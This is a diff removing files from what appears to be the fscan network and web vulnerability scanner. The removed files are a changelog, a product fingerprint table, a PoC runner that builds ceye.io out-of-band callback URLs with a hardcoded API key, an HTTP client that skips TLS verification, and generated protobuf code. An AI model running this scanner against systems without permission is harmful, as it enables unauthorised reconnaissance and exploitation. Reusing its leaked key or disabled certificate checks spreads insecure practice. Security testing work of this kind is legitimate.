[+] 2020/12/03 Optimize the ip segment processing module, icmp, port scanning module. 192.168.1.1-192.168.255.255 is supported.
|
||||
[+] 2020/11/17 The -ping parameter is added to replace icmp packets with ping in the survival detection module.
|
||||
[+] 2020/11/17 Web_Scan module and shiro simple recognition are added. Skip certificate authentication during https access. Separate the timeout of the service module and the web module, and add the -wt parameter (WebTimeout).
|
||||
[+] 2020/11/16 Optimize the icmp module and add the -it parameter (IcmpThreads). The default value is 11000, which is suitable for scanning section B.
|
||||
[+] 2020/11/15 Support importt ip from file, -hf ip.txt, and process de duplication ips.
|
||||
|
||||
[url-doczh]: README.md
|
|
@ -1,46 +0,0 @@
|
|||
package WebScan
|
||||
|
||||
import (
|
||||
"embed"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/WebScan/lib"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"net/http"
|
||||
"time"
|
||||
)
|
||||
|
||||
//go:embed pocs
|
||||
var Pocs embed.FS
|
||||
|
||||
func WebScan(info *common.HostInfo) {
|
||||
var pocinfo = common.Pocinfo
|
||||
pocinfo.Target = info.Url
|
||||
err := Execute(pocinfo)
|
||||
if err != nil && common.LogErr {
|
||||
fmt.Println(info.Url, err)
|
||||
}
|
||||
}
|
||||
|
||||
func Execute(PocInfo common.PocInfo) error {
|
||||
//PocInfo.Proxy = "http://127.0.0.1:8080"
|
||||
err := lib.InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
req, err := http.NewRequest("GET", PocInfo.Target, nil)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
|
||||
if PocInfo.Cookie != "" {
|
||||
req.Header.Set("Cookie", PocInfo.Cookie)
|
||||
}
|
||||
|
||||
if PocInfo.PocName != "" {
|
||||
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
|
||||
} else {
|
||||
lib.CheckMultiPoc(req, Pocs, PocInfo.Num, "")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
|
@ -1,137 +0,0 @@
|
|||
package info
|
||||
|
||||
type RuleData struct {
|
||||
Name string
|
||||
Type string
|
||||
Rule string
|
||||
}
|
||||
|
||||
type Md5Data struct {
|
||||
Name string
|
||||
Md5Str string
|
||||
}
|
||||
|
||||
var RuleDatas = []RuleData{
|
||||
{"Shiro", "headers", "(=deleteMe|rememberMe=)"},
|
||||
{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
|
||||
{"Gogs简易Git服务", "cookie", "(i_like_gogs)"},
|
||||
{"Gitea简易Git服务", "cookie", "(i_like_gitea)"},
|
||||
{"宝塔-BT.cn", "code", "(app.bt.cn/static/app.png|安全入口校验失败)"},
|
||||
{"Nexus", "code", "(Nexus Repository Manager)"},
|
||||
{"Nexus", "cookie", "(NX-ANTI-CSRF-TOKEN)"},
|
||||
{"Harbor", "code", "(<title>Harbor</title>)"},
|
||||
{"Harbor", "cookie", "(harbor-lang)"},
|
||||
{"禅道", "code", "(/theme/default/images/main/zt-logo.png)"},
|
||||
{"禅道", "cookie", "(zentaosid)"},
|
||||
{"协众OA", "code", "(Powered by 协众OA)"},
|
||||
{"协众OA", "cookie", "(CNOAOASESSID)"},
|
||||
{"xxl-job", "code", "(分布式任务调度平台XXL-JOB)"},
|
||||
{"atmail-WebMail", "cookie", "(atmail6)"},
|
||||
{"atmail-WebMail", "code", "(Powered by Atmail)"},
|
||||
{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin)"},
|
||||
{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
|
||||
{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
|
||||
{"Typecho", "code", "(Typecho</a>)"},
|
||||
{"金蝶EAS", "code", "(easSessionId)"},
|
||||
{"phpMyAdmin", "cookie", "(pma_lang|phpMyAdmin)"},
|
||||
{"phpMyAdmin", "code", "(/themes/pmahomme/img/logo_right.png)"},
|
||||
{"H3C-AM8000", "code", "(AM8000)"},
|
||||
{"360企业版", "code", "(360EntWebAdminMD5Secret)"},
|
||||
{"H3C公司产品", "code", "(service@h3c.com)"},
|
||||
{"H3C ICG 1000", "code", "(ICG 1000系统管理)"},
|
||||
{"Citrix-Metaframe", "code", "(window.location=\"/Citrix/MetaFrame)"},
|
||||
{"H3C ER5100", "code", "(ER5100系统管理)"},
|
||||
{"阿里云CDN", "code", "(cdn.aliyuncs.com)"},
|
||||
{"CISCO_EPC3925", "code", "(Docsis_system)"},
|
||||
{"CISCO ASR", "code", "(CISCO ASR)"},
|
||||
{"H3C ER3200", "code", "(ER3200系统管理)"},
|
||||
{"万户ezOFFICE", "headers", "(LocLan)"},
|
||||
{"万户网络", "code", "(css/css_whir.css)"},
|
||||
{"Spark_Master", "code", "(Spark Master at)"},
|
||||
{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
|
||||
{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
|
||||
{"深信服ssl-vpn", "code", "(login_psw.csp)"},
|
||||
{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
|
||||
{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
|
||||
{"juniper_vpn", "code", "(welcome.cgi?p=logo|/images/logo_juniper_reversed.gif)"},
|
||||
{"360主机卫士", "headers", "(zhuji.360.cn)"},
|
||||
{"Nagios", "headers", "(Nagios Access)"},
|
||||
{"H3C ER8300", "code", "(ER8300系统管理)"},
|
||||
{"Citrix-Access-Gateway", "code", "(Citrix Access Gateway)"},
|
||||
{"华为 MCU", "code", "(McuR5-min.js)"},
|
||||
{"TP-LINK Wireless WDR3600", "code", "(TP-LINK Wireless WDR3600)"},
|
||||
{"泛微协同办公OA", "headers", "(ecology_JSessionid)"},
|
||||
{"华为_HUAWEI_ASG2050", "code", "(HUAWEI ASG2050)"},
|
||||
{"360网站卫士", "code", "(360wzb)"},
|
||||
{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
|
||||
{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
|
||||
{"zabbix", "cookie", "(zbx_sessionid)"},
|
||||
{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA)"},
|
||||
{"CISCO_VPN", "headers", "(webvpn)"},
|
||||
{"360站长平台", "code", "(360-site-verification)"},
|
||||
{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
|
||||
{"o2security_vpn", "headers", "(client_param=install_active)"},
|
||||
{"H3C ER3260G2", "code", "(ER3260G2系统管理)"},
|
||||
{"H3C ICG1000", "code", "(ICG1000系统管理)"},
|
||||
{"CISCO-CX20", "code", "(CISCO-CX20)"},
|
||||
{"H3C ER5200", "code", "(ER5200系统管理)"},
|
||||
{"linksys-vpn-bragap14-parintins", "code",
|
||||
"(linksys-vpn-bragap14-parintins)"},
|
||||
{"360网站卫士常用前端公共库", "code", "(libs.useso.com)"},
|
||||
{"H3C ER3100", "code", "(ER3100系统管理)"},
|
||||
{"H3C-SecBlade-FireWall", "code", "(js/MulPlatAPI.js)"},
|
||||
{"360webfacil_360WebManager", "code", "(publico/template/)"},
|
||||
{"Citrix_Netscaler", "code", "(ns_af)"},
|
||||
{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
|
||||
{"H3C ER3260", "code", "(ER3260系统管理)"},
|
||||
{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
|
||||
{"exchange", "code", "(/owa/auth.owa)"},
|
||||
{"Spark_Worker", "code", "(Spark Worker at)"},
|
||||
{"H3C ER3108G", "code", "(ER3108G系统管理)"},
|
||||
{"深信服防火墙类产品", "code", "(SANGFOR FW)"},
|
||||
{"Citrix-ConfProxy", "code", "(confproxy)"},
|
||||
{"360网站安全检测", "code", "(webscan.360.cn/status/pai/hash)"},
|
||||
{"H3C ER5200G2", "code", "(ER5200G2系统管理)"},
|
||||
{"华为(HUAWEI)安全设备", "code", "(sweb-lib/resource/)"},
|
||||
{"H3C ER6300", "code", "(ER6300系统管理)"},
|
||||
{"华为_HUAWEI_ASG2100", "code", "(HUAWEI ASG2100)"},
|
||||
{"TP-Link 3600 DD-WRT", "code", "(TP-Link 3600 DD-WRT)"},
|
||||
{"NETGEAR WNDR3600", "code", "(NETGEAR WNDR3600)"},
|
||||
{"H3C ER2100", "code", "(ER2100系统管理)"},
|
||||
{"绿盟下一代防火墙", "code", "(NSFOCUS NF)"},
|
||||
{"jira", "code", "(jira.webresources)"},
|
||||
{"金和协同管理平台", "code", "(金和协同管理平台)"},
|
||||
{"Citrix-NetScaler", "code", "(NS-CACHE)"},
|
||||
{"linksys-vpn", "headers", "(linksys-vpn)"},
|
||||
{"通达OA", "code", "(/static/images/tongda.ico)"},
|
||||
{"华为(HUAWEI)Secoway设备", "code", "(Secoway)"},
|
||||
{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
|
||||
{"H3C ER2100n", "code", "(ER2100n系统管理)"},
|
||||
{"H3C ER8300G2", "code", "(ER8300G2系统管理)"},
|
||||
{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js)"},
|
||||
{"Jboss", "code", "(Welcome to JBoss|jboss.css)"},
|
||||
{"Jboss", "headers", "(JBoss)"},
|
||||
{"泛微E-mobile", "code", "(Weaver E-mobile)"},
|
||||
{"齐治堡垒机", "code", "(logo-icon-ico72.png)"},
|
||||
}
|
||||
|
||||
var Md5Datas = []Md5Data{
|
||||
{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
|
||||
{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
|
||||
{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
|
||||
{"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
|
||||
{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
|
||||
{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
|
||||
{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
|
||||
{"致远OA", "57f307ad3764553df84e7b14b7a85432"},
|
||||
{"致远OA", "3c8df395ec2cbd72782286d18a286a9a"},
|
||||
{"致远OA", "2f761c27b6b7f9386bbd61403635dc42"},
|
||||
{"齐治堡垒机", "48ee373f098d8e96e53b7dd778f09ff4"},
|
||||
{"SprintBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
|
||||
{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
|
||||
{"通达OA", "ed0044587917c76d08573577c8b72883"},
|
||||
{"泛微OA", "41eca7a9245394106a09b2534d8030df"},
|
||||
{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
|
||||
{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
|
||||
{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
|
||||
}
|
|
@ -1,208 +0,0 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"embed"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"math/rand"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"sort"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
ceyeApi = "a78a1cb49d91fe09e01876078d1868b2"
|
||||
ceyeDomain = "7wtusr.ceye.io"
|
||||
)
|
||||
|
||||
type Task struct {
|
||||
Req *http.Request
|
||||
Poc *Poc
|
||||
}
|
||||
|
||||
func CheckMultiPoc(req *http.Request, Pocs embed.FS, workers int, pocname string) {
|
||||
tasks := make(chan Task)
|
||||
var wg sync.WaitGroup
|
||||
for i := 0; i < workers; i++ {
|
||||
go func() {
|
||||
wg.Add(1)
|
||||
for task := range tasks {
|
||||
isVul, err := executePoc(task.Req, task.Poc)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if isVul {
|
||||
result := fmt.Sprintf("%s %s", task.Req.URL, task.Poc.Name)
|
||||
common.LogSuccess(result)
|
||||
}
|
||||
}
|
||||
wg.Done()
|
||||
}()
|
||||
}
|
||||
for _, poc := range LoadMultiPoc(Pocs, pocname) {
|
||||
task := Task{
|
||||
Req: req,
|
||||
Poc: poc,
|
||||
}
|
||||
tasks <- task
|
||||
}
|
||||
close(tasks)
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
func executePoc(oReq *http.Request, p *Poc) (bool, error) {
|
||||
c := NewEnvOption()
|
||||
c.UpdateCompileOptions(p.Set)
|
||||
env, err := NewEnv(&c)
|
||||
if err != nil {
|
||||
fmt.Println("environment creation error: %s\n", err)
|
||||
return false, err
|
||||
}
|
||||
variableMap := make(map[string]interface{})
|
||||
req, err := ParseRequest(oReq)
|
||||
if err != nil {
|
||||
//fmt.Println(err)
|
||||
return false, err
|
||||
}
|
||||
variableMap["request"] = req
|
||||
|
||||
// 现在假定set中payload作为最后产出,那么先排序解析其他的自定义变量,更新map[string]interface{}后再来解析payload
|
||||
keys := make([]string, 0)
|
||||
for k := range p.Set {
|
||||
keys = append(keys, k)
|
||||
}
|
||||
sort.Strings(keys)
|
||||
|
||||
for _, k := range keys {
|
||||
expression := p.Set[k]
|
||||
if k != "payload" {
|
||||
if expression == "newReverse()" {
|
||||
variableMap[k] = newReverse()
|
||||
continue
|
||||
}
|
||||
out, err := Evaluate(env, expression, variableMap)
|
||||
if err != nil {
|
||||
//fmt.Println(err)
|
||||
continue
|
||||
}
|
||||
switch value := out.Value().(type) {
|
||||
case *UrlType:
|
||||
variableMap[k] = UrlTypeToString(value)
|
||||
case int64:
|
||||
variableMap[k] = int(value)
|
||||
case []uint8:
|
||||
variableMap[k] = fmt.Sprintf("%s", out)
|
||||
default:
|
||||
variableMap[k] = fmt.Sprintf("%v", out)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if p.Set["payload"] != "" {
|
||||
out, err := Evaluate(env, p.Set["payload"], variableMap)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
variableMap["payload"] = fmt.Sprintf("%v", out)
|
||||
}
|
||||
|
||||
success := false
|
||||
for _, rule := range p.Rules {
|
||||
for k1, v1 := range variableMap {
|
||||
_, isMap := v1.(map[string]string)
|
||||
if isMap {
|
||||
continue
|
||||
}
|
||||
value := fmt.Sprintf("%v", v1)
|
||||
for k2, v2 := range rule.Headers {
|
||||
rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
|
||||
}
|
||||
rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
|
||||
rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
|
||||
}
|
||||
|
||||
if oReq.URL.Path != "" && oReq.URL.Path != "/" {
|
||||
req.Url.Path = fmt.Sprint(oReq.URL.Path, rule.Path)
|
||||
} else {
|
||||
req.Url.Path = rule.Path
|
||||
}
|
||||
// 某些poc没有区分path和query,需要处理
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
|
||||
req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
|
||||
|
||||
newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
|
||||
newRequest.Header = oReq.Header.Clone()
|
||||
for k, v := range rule.Headers {
|
||||
newRequest.Header.Set(k, v)
|
||||
}
|
||||
resp, err := DoRequest(newRequest, rule.FollowRedirects)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
variableMap["response"] = resp
|
||||
// 先判断响应页面是否匹配search规则
|
||||
if rule.Search != "" {
|
||||
result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
|
||||
if result != nil && len(result) > 0 { // 正则匹配成功
|
||||
for k, v := range result {
|
||||
variableMap[k] = v
|
||||
}
|
||||
//return false, nil
|
||||
} else {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
|
||||
out, err := Evaluate(env, rule.Expression, variableMap)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
//fmt.Println(fmt.Sprintf("%v, %s", out, out.Type().TypeName()))
|
||||
if fmt.Sprintf("%v", out) == "false" { //如果false不继续执行后续rule
|
||||
success = false // 如果最后一步执行失败,就算前面成功了最终依旧是失败
|
||||
break
|
||||
}
|
||||
success = true
|
||||
}
|
||||
return success, nil
|
||||
}
|
||||
|
||||
func doSearch(re string, body string) map[string]string {
|
||||
r, err := regexp.Compile(re)
|
||||
if err != nil {
|
||||
return nil
|
||||
}
|
||||
result := r.FindStringSubmatch(body)
|
||||
names := r.SubexpNames()
|
||||
if len(result) > 1 && len(names) > 1 {
|
||||
paramsMap := make(map[string]string)
|
||||
for i, name := range names {
|
||||
if i > 0 && i <= len(result) {
|
||||
paramsMap[name] = result[i]
|
||||
}
|
||||
}
|
||||
return paramsMap
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func newReverse() *Reverse {
|
||||
letters := "1234567890abcdefghijklmnopqrstuvwxyz"
|
||||
randSource := rand.New(rand.NewSource(time.Now().Unix()))
|
||||
sub := RandomStr(randSource, letters, 8)
|
||||
if ceyeDomain == "" {
|
||||
return &Reverse{}
|
||||
}
|
||||
urlStr := fmt.Sprintf("http://%s.%s", sub, ceyeDomain)
|
||||
u, _ := url.Parse(urlStr)
|
||||
return &Reverse{
|
||||
Url: ParseUrl(u),
|
||||
Domain: u.Hostname(),
|
||||
Ip: "",
|
||||
IsDomainNameServer: false,
|
||||
}
|
||||
}
|
|
@ -1,171 +0,0 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"compress/gzip"
|
||||
"crypto/tls"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"strconv"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
client *http.Client
|
||||
clientNoRedirect *http.Client
|
||||
dialTimout = 5 * time.Second
|
||||
keepAlive = 15 * time.Second
|
||||
)
|
||||
|
||||
func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) error {
|
||||
dialer := &net.Dialer{
|
||||
Timeout: dialTimout,
|
||||
KeepAlive: keepAlive,
|
||||
}
|
||||
|
||||
tr := &http.Transport{
|
||||
DialContext: dialer.DialContext,
|
||||
//MaxConnsPerHost: 0,
|
||||
MaxIdleConns: 1000,
|
||||
MaxIdleConnsPerHost: ThreadsNum * 2,
|
||||
IdleConnTimeout: keepAlive,
|
||||
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
|
||||
TLSHandshakeTimeout: 5 * time.Second,
|
||||
DisableKeepAlives: false,
|
||||
}
|
||||
if DownProxy != "" {
|
||||
u, err := url.Parse(DownProxy)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
tr.Proxy = http.ProxyURL(u)
|
||||
}
|
||||
|
||||
client = &http.Client{
|
||||
Transport: tr,
|
||||
Timeout: Timeout,
|
||||
}
|
||||
clientNoRedirect = &http.Client{
|
||||
Transport: tr,
|
||||
Timeout: Timeout,
|
||||
}
|
||||
clientNoRedirect.CheckRedirect = func(req *http.Request, via []*http.Request) error {
|
||||
return http.ErrUseLastResponse
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func DoRequest(req *http.Request, redirect bool) (*Response, error) {
|
||||
if req.Body == nil || req.Body == http.NoBody {
|
||||
} else {
|
||||
req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
|
||||
if req.Header.Get("Content-Type") == "" {
|
||||
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
}
|
||||
|
||||
var oResp *http.Response
|
||||
var err error
|
||||
if redirect {
|
||||
oResp, err = client.Do(req)
|
||||
} else {
|
||||
oResp, err = clientNoRedirect.Do(req)
|
||||
}
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
defer oResp.Body.Close()
|
||||
resp, err := ParseResponse(oResp)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return resp, err
|
||||
}
|
||||
|
||||
func ParseUrl(u *url.URL) *UrlType {
|
||||
nu := &UrlType{}
|
||||
nu.Scheme = u.Scheme
|
||||
nu.Domain = u.Hostname()
|
||||
nu.Host = u.Host
|
||||
nu.Port = u.Port()
|
||||
nu.Path = u.EscapedPath()
|
||||
nu.Query = u.RawQuery
|
||||
nu.Fragment = u.Fragment
|
||||
return nu
|
||||
}
|
||||
|
||||
func ParseRequest(oReq *http.Request) (*Request, error) {
|
||||
req := &Request{}
|
||||
req.Method = oReq.Method
|
||||
req.Url = ParseUrl(oReq.URL)
|
||||
header := make(map[string]string)
|
||||
for k := range oReq.Header {
|
||||
header[k] = oReq.Header.Get(k)
|
||||
}
|
||||
req.Headers = header
|
||||
req.ContentType = oReq.Header.Get("Content-Type")
|
||||
if oReq.Body == nil || oReq.Body == http.NoBody {
|
||||
} else {
|
||||
data, err := ioutil.ReadAll(oReq.Body)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
req.Body = data
|
||||
oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
|
||||
}
|
||||
return req, nil
|
||||
}
|
||||
|
||||
func ParseResponse(oResp *http.Response) (*Response, error) {
|
||||
var resp Response
|
||||
header := make(map[string]string)
|
||||
resp.Status = int32(oResp.StatusCode)
|
||||
resp.Url = ParseUrl(oResp.Request.URL)
|
||||
for k := range oResp.Header {
|
||||
header[k] = oResp.Header.Get(k)
|
||||
}
|
||||
resp.Headers = header
|
||||
resp.ContentType = oResp.Header.Get("Content-Type")
|
||||
body, err := getRespBody(oResp)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
resp.Body = body
|
||||
return &resp, nil
|
||||
}
|
||||
|
||||
func getRespBody(oResp *http.Response) ([]byte, error) {
|
||||
var body []byte
|
||||
if oResp.Header.Get("Content-Encoding") == "gzip" {
|
||||
gr, err := gzip.NewReader(oResp.Body)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
defer gr.Close()
|
||||
for {
|
||||
buf := make([]byte, 1024)
|
||||
n, err := gr.Read(buf)
|
||||
if err != nil && err != io.EOF {
|
||||
//utils.Logger.Error(err)
|
||||
return nil, err
|
||||
}
|
||||
if n == 0 {
|
||||
break
|
||||
}
|
||||
body = append(body, buf...)
|
||||
}
|
||||
} else {
|
||||
raw, err := ioutil.ReadAll(oResp.Body)
|
||||
if err != nil {
|
||||
//utils.Logger.Error(err)
|
||||
return nil, err
|
||||
}
|
||||
defer oResp.Body.Close()
|
||||
body = raw
|
||||
}
|
||||
return body, nil
|
||||
}
|
|
@ -1,354 +0,0 @@
|
|||
// Code generated by protoc-gen-go. DO NOT EDIT.
|
||||
// source: http.proto
|
||||
|
||||
package lib
|
||||
|
||||
import (
|
||||
fmt "fmt"
|
||||
proto "github.com/golang/protobuf/proto"
|
||||
math "math"
|
||||
)
|
||||
|
||||
// Reference imports to suppress errors if they are not otherwise used.
|
||||
var _ = proto.Marshal
|
||||
var _ = fmt.Errorf
|
||||
var _ = math.Inf
|
||||
|
||||
// This is a compile-time assertion to ensure that this generated file
|
||||
// is compatible with the proto package it is being compiled against.
|
||||
// A compilation error at this line likely means your copy of the
|
||||
// proto package needs to be updated.
|
||||
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
|
||||
|
||||
type UrlType struct {
|
||||
Scheme string `protobuf:"bytes,1,opt,name=scheme,proto3" json:"scheme,omitempty"`
|
||||
Domain string `protobuf:"bytes,2,opt,name=domain,proto3" json:"domain,omitempty"`
|
||||
Host string `protobuf:"bytes,3,opt,name=host,proto3" json:"host,omitempty"`
|
||||
Port string `protobuf:"bytes,4,opt,name=port,proto3" json:"port,omitempty"`
|
||||
Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"`
|
||||
Query string `protobuf:"bytes,6,opt,name=query,proto3" json:"query,omitempty"`
|
||||
Fragment string `protobuf:"bytes,7,opt,name=fragment,proto3" json:"fragment,omitempty"`
|
||||
XXX_NoUnkeyedLiteral struct{} `json:"-"`
|
||||
XXX_unrecognized []byte `json:"-"`
|
||||
XXX_sizecache int32 `json:"-"`
|
||||
}
|
||||
|
||||
func (m *UrlType) Reset() { *m = UrlType{} }
|
||||
func (m *UrlType) String() string { return proto.CompactTextString(m) }
|
||||
func (*UrlType) ProtoMessage() {}
|
||||
func (*UrlType) Descriptor() ([]byte, []int) {
|
||||
return fileDescriptor_11b04836674e6f94, []int{0}
|
||||
}
|
||||
|
||||
func (m *UrlType) XXX_Unmarshal(b []byte) error {
|
||||
return xxx_messageInfo_UrlType.Unmarshal(m, b)
|
||||
}
|
||||
func (m *UrlType) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
|
||||
return xxx_messageInfo_UrlType.Marshal(b, m, deterministic)
|
||||
}
|
||||
func (m *UrlType) XXX_Merge(src proto.Message) {
|
||||
xxx_messageInfo_UrlType.Merge(m, src)
|
||||
}
|
||||
func (m *UrlType) XXX_Size() int {
|
||||
return xxx_messageInfo_UrlType.Size(m)
|
||||
}
|
||||
func (m *UrlType) XXX_DiscardUnknown() {
|
||||
xxx_messageInfo_UrlType.DiscardUnknown(m)
|
||||
}
|
||||
|
||||
var xxx_messageInfo_UrlType proto.InternalMessageInfo
|
||||
|
||||
func (m *UrlType) GetScheme() string {
|
||||
if m != nil {
|
||||
return m.Scheme
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetDomain() string {
|
||||
if m != nil {
|
||||
return m.Domain
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetHost() string {
|
||||
if m != nil {
|
||||
return m.Host
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetPort() string {
|
||||
if m != nil {
|
||||
return m.Port
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetPath() string {
|
||||
if m != nil {
|
||||
return m.Path
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetQuery() string {
|
||||
if m != nil {
|
||||
return m.Query
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *UrlType) GetFragment() string {
|
||||
if m != nil {
|
||||
return m.Fragment
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
type Request struct {
|
||||
Url *UrlType `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
|
||||
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
|
||||
ContentType string `protobuf:"bytes,4,opt,name=content_type,json=contentType,proto3" json:"content_type,omitempty"`
|
||||
Body []byte `protobuf:"bytes,5,opt,name=body,proto3" json:"body,omitempty"`
|
||||
XXX_NoUnkeyedLiteral struct{} `json:"-"`
|
||||
XXX_unrecognized []byte `json:"-"`
|
||||
XXX_sizecache int32 `json:"-"`
|
||||
}
|
||||
|
||||
func (m *Request) Reset() { *m = Request{} }
|
||||
func (m *Request) String() string { return proto.CompactTextString(m) }
|
||||
func (*Request) ProtoMessage() {}
|
||||
func (*Request) Descriptor() ([]byte, []int) {
|
||||
return fileDescriptor_11b04836674e6f94, []int{1}
|
||||
}
|
||||
|
||||
func (m *Request) XXX_Unmarshal(b []byte) error {
|
||||
return xxx_messageInfo_Request.Unmarshal(m, b)
|
||||
}
|
||||
func (m *Request) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
|
||||
return xxx_messageInfo_Request.Marshal(b, m, deterministic)
|
||||
}
|
||||
func (m *Request) XXX_Merge(src proto.Message) {
|
||||
xxx_messageInfo_Request.Merge(m, src)
|
||||
}
|
||||
func (m *Request) XXX_Size() int {
|
||||
return xxx_messageInfo_Request.Size(m)
|
||||
}
|
||||
func (m *Request) XXX_DiscardUnknown() {
|
||||
xxx_messageInfo_Request.DiscardUnknown(m)
|
||||
}
|
||||
|
||||
var xxx_messageInfo_Request proto.InternalMessageInfo
|
||||
|
||||
func (m *Request) GetUrl() *UrlType {
|
||||
if m != nil {
|
||||
return m.Url
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Request) GetMethod() string {
|
||||
if m != nil {
|
||||
return m.Method
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *Request) GetHeaders() map[string]string {
|
||||
if m != nil {
|
||||
return m.Headers
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Request) GetContentType() string {
|
||||
if m != nil {
|
||||
return m.ContentType
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *Request) GetBody() []byte {
|
||||
if m != nil {
|
||||
return m.Body
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type Response struct {
|
||||
Url *UrlType `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Status int32 `protobuf:"varint,2,opt,name=status,proto3" json:"status,omitempty"`
|
||||
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
|
||||
